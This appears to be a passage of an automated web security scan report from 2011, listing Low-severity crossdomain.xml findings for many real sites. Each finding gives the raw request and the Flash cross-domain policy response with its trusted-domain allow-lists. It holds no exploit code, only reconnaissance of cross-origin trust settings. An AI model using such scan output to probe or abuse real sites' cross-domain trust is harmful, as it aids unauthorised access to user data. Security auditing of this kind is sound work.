...[SNIP]... <allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.wknyc.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.nba.com" to-ports="*"/> <allow-access-from domain="hive.cachefly.net" to-ports="*" /> ...[SNIP]... <allow-access-from domain="espn.nanogaming.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.dolimg.com" to-ports="*"/> <allow-access-from domain="*.yieldmanager.com" to-ports="*"/> <allow-access-from domain="*.akqa.com" to-ports="*"/> <allow-access-from domain="*.designbloxlive.com" to-ports="*"/> <allow-access-from domain="ds.serving-sys.com" to-ports="*"/> <allow-access-from domain="*.arndev.com" to-ports="*"/> <allow-access-from domain="nascar.blitzagency.com" to-ports="*"/> <allow-access-from domain="*.abc.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.vml.com" to-ports="*"/> <allow-access-from domain="*.vmltest.com" to-ports="*"/> <allow-access-from domain="*.vmldev.com" to-ports="*"/> <allow-access-from domain="*.vmlstage.com" to-ports="*"/> <allow-access-from domain="*.collegegameday.com" to-ports="*"/> <allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.adsfac.us" secure="true" /> ...[SNIP]... <allow-access-from domain="*.videoegg.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.google.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.youtube.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ytimg.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.client-projects.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="173.45.231.98" to-ports="*"/> <allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.facebook.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.theview.tv" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="redinter.vo.llnwd.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.soapnet.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="jayski.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.squarewave.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.heavenspotdev.com" secure="true" /> ...[SNIP]... <allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.espndb.com"/> <allow-access-from domain="*.foxtel.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.verizon.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.espn.pvt" to-ports="*"/> <allow-access-from domain="*.xif.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dartmotif.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.miclients.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adimages.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.questionmarket.com" secure="false"/> ...[SNIP]... <allow-access-from domain="all360poker.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.adinterax.com" /> <allow-access-from domain="infinitidev.tbwachiatdev <allow-access-from domain="*.coachespicmixerterms <allow-access-from domain="*.coachpicmixerpriva <allow-access-from domain="*.ooyala.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.playdom.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sportsR.us" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.mycorplink.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.fanflex.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="preview.espncreativeworks ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://friendfeed.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: friendfeed.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 321 Vary: Cookie Server: FriendFeedServer/0.1 Etag: "d69a789b2865b15041a Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" <cross-domain-policy xsi:noNamespaceSchem <allow-access-from domain="*.friendfeed.com"/> <site-control permitted-cross-domain ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Sat, 03 Sep 2011 23:16:24 GMT Expires: Sun, 04 Sep 2011 23:16:24 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 7573 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://grfx.cstv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: grfx.cstv.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "1717425046" Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT Content-Length: 909 Server: lighttpd/1.4.19 Date: Sun, 04 Sep 2011 00:45:29 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.fansonly.com" /> <allow-access-from domain="*.initinteractive.com" /> <allow-access-from domain="174.132.109.106" /> <allow-access-from domain="*.cstv.com" /> <allow-access-from domain="*.ocsn.com" /> <allow-access-from domain="*.collegesports.com" /> <allow-access-from domain="livestats.*.fansonly.com" /> <allow-access-from domain="livestats.*.cstv.com" /> <allow-access-from domain="livestats.*.collegesports <allow-access-from domain="*.rolltide.com" /> <allow-access-from domain="*.ucirvinesports.com" /> <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="flv.sales.cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="mediapm.edgesuite.net" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ocp.ncaa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ocp.ncaa.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:23:08 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 7358 Keep-Alive: timeout=15, max=970 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.bnet.com" /> <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="*.cbsaroundtheworld.com" /> <allow-access-from domain="*.cbsgames.com" /> <allow-access-from domain="*.cbsig.net"/> <allow-access-from domain="*.cbsnews.com" /> <allow-access-from domain="*.cbssports.com" /> <allow-access-from domain="*.chat.com" /> <allow-access-from domain="*.chow.com" /> <allow-access-from domain="*.chowhound.com" /> <allow-access-from domain="*.cnet.com" /> <allow-access-from domain="*.cnettv.com" /> <allow-access-from domain="*.com.com" /> <allow-access-from domain="*.download.com" /> <allow-access-from domain="*.filmspot.com" /> <allow-access-from domain="*.findarticles.com" /> <allow-access-from domain="*.gamefaqs.com" /> <allow-access-from domain="*.gamerankings.com" /> <allow-access-from domain="*.gamespot.com" /> <allow-access-from domain="*.help.com" /> <allow-access-from domain="*.iphoneatlas.com" /> <allow-access-from domain="*.itpapers.com" /> <allow-access-from domain="*.juke.com" /> <allow-access-from domain="*.last.fm" /> <allow-access-from domain="*.macfixit.com" /> <allow-access-from domain="*.macfixitforums.com" /> <allow-access-from domain="*.maxpreps.com" /> <allow-access-from domain="*.metacritic.com" /> <allow-access-from domain="*.mp3.com" /> <allow-access-from domain="*.moblogic.tv" /> <allow-access-from domain="*.moneywatch.com" /> <allow-access-from domain="*.movietome.com" /> <allow-access-from domain="*.mysimon.com" /> <allow-access-from domain="*.ncaa.com" /> <allow-access-from domain="*.news.com" /> <allow-access-from domain="*.ourchart.com" /> <allow-access-from domain="*.reuters.com" /> <allow-access-from domain="*.search.com" /> <allow-access-from domain="*.shareware.com" /> <allow-access-from domain="*.shopper.com" /> <allow-access-from domain="*.smartplanet.com" /> <allow-access-from domain="*.sportsgamer.com" /> <allow-access-from domain="*.sportsline.com" /> <allow-access-from domain="*.startrek.com" /> <allow-access-from domain="*.techrepublic.com" /> <allow-access-from domain="*.theinsider.com" /> <allow-access-from domain="*.trupreps.com" /> <allow-access-from domain="*.tv.com" /> <allow-access-from domain="*.urbanbaby.com" /> <allow-access-from domain="*.versiontracker.com" /> <allow-access-from domain="*.wallstrip.com" /> <allow-access-from domain="*.webware.com" /> <allow-access-from domain="*.winfiles.com" /> <allow-access-from domain="*.zdnet.com" /> <allow-access-from domain="*.zdnet.com.au" /> <allow-access-from domain="*.zdnet.com.uk" /> <allow-access-from domain="*.zdnetasia.com" /> <allow-access-from domain="*.cbsinteractive.com" /> <allow-access-from domain="*.powervideosuite.com" /> ...[SNIP]... <allow-access-from domain="*.clipsync.com"/> ...[SNIP]... <allow-access-from domain="212.86.251.190"/> ...[SNIP]... <allow-access-from domain="*.crunchyroll.com" /> ...[SNIP]... <allow-access-from domain="*.techmatter.com" /> ...[SNIP]... <allow-access-from domain="*.amazon.com" /> ...[SNIP]... <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.att.com" /> <allow-access-from domain="*.attributor.com" /> <allow-access-from domain="*.bebo.com" /> <allow-access-from domain="*.blinkx.com" /> <allow-access-from domain="*.boxee.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.buddytv.com" /> <allow-access-from domain="*.cbsmobile.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.comcast.com" /> <allow-access-from domain="*.comcastnet.com" /> <allow-access-from domain="*.cooliris.com" /> <allow-access-from domain="*.dell.com" /> <allow-access-from domain="*.et.com" /> <allow-access-from domain="*.fanpop.com" /> <allow-access-from domain="*.freestream.com" /> <allow-access-from domain="*.fuhu.com" /> <allow-access-from domain="*.gotuit.com" /> <allow-access-from domain="*.grabnetworks.com" /> <allow-access-from domain="*.harpers.com" /> <allow-access-from domain="*.hp.com" /> <allow-access-from domain="*.imdb.com" /> <allow-access-from domain="*.iwidget.com" /> <allow-access-from domain="*.joost.com" /> <allow-access-from domain="*.meevee.com" /> <allow-access-from domain="*.metacafe.com" /> <allow-access-from domain="*.msn.com" /> <allow-access-from domain="*.msnsearch.com" /> <allow-access-from domain="*.netflix.com" /> <allow-access-from domain="*.radio.com" /> <allow-access-from domain="*.sands.com" /> <allow-access-from domain="*.showtime.com" /> <allow-access-from domain="*.slide.com" /> <allow-access-from domain="*.sling.com" /> <allow-access-from domain="*.sony.com" /> <allow-access-from domain="*.tidaltv.com" /> <allow-access-from domain="*.transpond.com" /> <allow-access-from domain="*.tvguide.com" /> <allow-access-from domain="*.tvstations.com" /> <allow-access-from domain="*.veoh.com" /> <allow-access-from domain="*.yahoo.com" /> <allow-access-from domain="*.youtube.com" /> ...[SNIP]... <allow-access-from domain="*.bing.com" /> ...[SNIP]... <allow-access-from domain="*.comcast.net" /> <allow-access-from domain="*.fancast.com" /> <allow-access-from domain="*.blinx.com" /> <allow-access-from domain="apps.facebook.com" /> ...[SNIP]... <allow-access-from domain="*.ytimg.com"/> ...[SNIP]... <allow-access-from domain="*.ustream.tv"/> ...[SNIP]... <allow-access-from domain="*.sho.com"/> ...[SNIP]... <allow-access-from domain="*.cbsinteractive.com.au"/> ...[SNIP]... <allow-access-from domain="*.quantserve.com"/> ...[SNIP]... <allow-access-from domain="*.cbsimg.net" /> ...[SNIP]... <allow-access-from domain="*.yahoo.net"/> ...[SNIP]... <allow-access-from domain="*.yimg.com"/> ...[SNIP]... <allow-access-from domain="*.ooyala.com"/> ...[SNIP]... <allow-access-from domain="*.yldmgrimg.net"/> ...[SNIP]... <allow-access-from domain="*.cstv.com"/> ...[SNIP]... <allow-access-from domain="*.eyewonderlabs.com"/> ...[SNIP]... <allow-access-from domain="*.eyewonder.com"/> ...[SNIP]... <allow-access-from domain="*.maxpreps.com.edgesuite ...[SNIP]... <allow-access-from domain="*.livestream.com"/> ...[SNIP]... <allow-access-from domain="*.justin.tv"/> ...[SNIP]... <allow-access-from domain="*.adap.tv"/> ...[SNIP]... <allow-access-from domain="*.dev.cbssports.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net"/> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.g.doubleclick.net"/> <allow-access-from domain="*.liverail.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://onlyfans.cstv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: onlyfans.cstv.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:34 GMT Server: Apache P3P: policyref="http://www Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT Accept-Ranges: bytes Content-Length: 909 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.fansonly.com" /> <allow-access-from domain="*.initinteractive.com" /> <allow-access-from domain="174.132.109.106" /> <allow-access-from domain="*.cstv.com" /> <allow-access-from domain="*.ocsn.com" /> <allow-access-from domain="*.collegesports.com" /> <allow-access-from domain="livestats.*.fansonly.com" /> <allow-access-from domain="livestats.*.cstv.com" /> <allow-access-from domain="livestats.*.collegesports <allow-access-from domain="*.rolltide.com" /> <allow-access-from domain="*.ucirvinesports.com" /> <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="flv.sales.cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="mediapm.edgesuite.net" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optimized-by.rubicon |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:45:00 GMT Server: RAS/1.3 (Unix) Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Accept-Ranges: bytes Content-Length: 223 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rubiconproject.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Sat, 03 Sep 2011 23:17:24 GMT Expires: Sun, 04 Sep 2011 23:17:24 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 6476 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://picasaweb.google |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: picasaweb.google.com |
HTTP/1.0 200 OK Expires: Mon, 05 Sep 2011 01:23:13 GMT Date: Sun, 04 Sep 2011 01:23:13 GMT Cache-Control: public, max-age=86400 Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.ru" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.co.th" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.bg" /> <allow-access-from domain="*.google.hr" /> <allow-access-from domain="*.google.cz" /> <allow-access-from domain="*.google.gr" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.hu" /> <allow-access-from domain="*.google.co.id" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.google.si" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://portfolio.us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: portfolio.us.reuters.com |
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 01:23:24 GMT Content-Length: 736 Content-Type: text/xml Last-Modified: Tue, 24 Nov 2009 19:47:55 GMT Accept-Ranges: bytes ETag: "f8f85b43f6dca1:efb4" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.reuters.com" /> <al ...[SNIP]... <allow-access-from domain="reuters.com" /> ...[SNIP]... <allow-access-from domain="reuters.com" /> ...[SNIP]... <allow-access-from domain="usa.qa.reuters.com" /> <allow-access-from domain="uk.qa.reuters.com" /> <allow-access-from domain="jp.qa.reuters.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Sun, 04 Sep 2011 00:13:02 GMT Expires: Mon, 05 Sep 2011 00:13:02 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 4222 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://rd.rlcdn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rd.rlcdn.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/xml Content-Length: 500 Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.casualcollective.com" /> <allow-access-from domain="*.tubemogul.com" /> <allow-access-from domain="*.inplay.tubemogul.com" /> <allow-access-from domain="*.grooveshark.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adotube.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://rtq.careerbuilder |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rtq.careerbuilder.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Thu, 19 May 2011 19:43:17 GMT Accept-Ranges: bytes ETag: "d89fcdff5c16cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: REBEL43 Date: Sun, 04 Sep 2011 00:57:57 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://search.charlo |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: search.charlotteobserver |
